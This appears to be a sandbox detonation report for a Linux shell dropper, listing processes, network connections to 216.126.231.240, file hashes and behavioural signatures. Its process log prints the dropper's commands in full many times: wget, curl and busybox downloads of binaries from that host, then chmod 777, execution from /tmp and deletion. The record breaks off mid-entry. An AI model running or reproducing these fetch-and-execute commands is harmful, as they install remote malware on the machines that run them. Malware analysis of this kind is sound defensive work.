[rm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/usr/bin/wget
[wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/chmod
[chmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda
[./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/rm
[rm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 151.101.193.91:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 195.181.164.14:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-10 01:07
Reported
2024-11-10 01:10
Platform
debian9-armhf-20240611-en
Max time kernel
30s
Max time network
57s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | N/A |
| N/A | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | N/A |
| N/A | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | N/A |
| N/A | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | N/A |
| N/A | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | N/A |
| N/A | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | N/A |
| N/A | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | N/A |
| N/A | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | N/A |
| N/A | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | N/A |
| N/A | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | N/A |
| N/A | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | N/A |
| N/A | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | N/A |
| N/A | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | N/A |
| N/A | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | N/A |
| N/A | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | N/A |
| N/A | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | N/A |
| N/A | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | N/A |
| N/A | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | /usr/bin/curl | N/A |
| File opened for modification | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /usr/bin/curl | N/A |
Processes
/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh
[/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/chmod
[chmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR
[./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/rm
[rm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/usr/bin/wget
[wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/chmod
[chmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b
[./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/rm
[rm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/usr/bin/wget
[wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/chmod
[chmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy
[./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/rm
[rm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/usr/bin/wget
[wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/chmod
[chmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X
[./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/rm
[rm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/usr/bin/wget
[wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/chmod
[chmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w
[./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/rm
[rm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/usr/bin/wget
[wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/chmod
[chmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda
[./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/rm
[rm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/usr/bin/wget
[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/chmod
[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs
[./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/rm
[rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/usr/bin/wget
[wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/chmod
[chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM
[./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/rm
[rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/usr/bin/wget
[wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/chmod
[chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C
[./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/rm
[rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/usr/bin/wget
[wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/chmod
[chmod 777 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp
[./KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/rm
[rm KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/usr/bin/wget
[wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/chmod
[chmod 777 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK
[./EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/rm
[rm EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/usr/bin/wget
[wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/chmod
[chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE
[./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/rm
[rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/usr/bin/wget
[wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/chmod
[chmod 777 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe
[./ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/rm
[rm ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/usr/bin/wget
[wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/chmod
[chmod 777 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw
[./giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/rm
[rm giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/chmod
[chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM
[./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/rm
[rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/usr/bin/wget
[wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/chmod
[chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C
[./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/rm
[rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/usr/bin/wget
[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/chmod
[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs
[./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/rm
[rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/usr/bin/wget
[wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/chmod
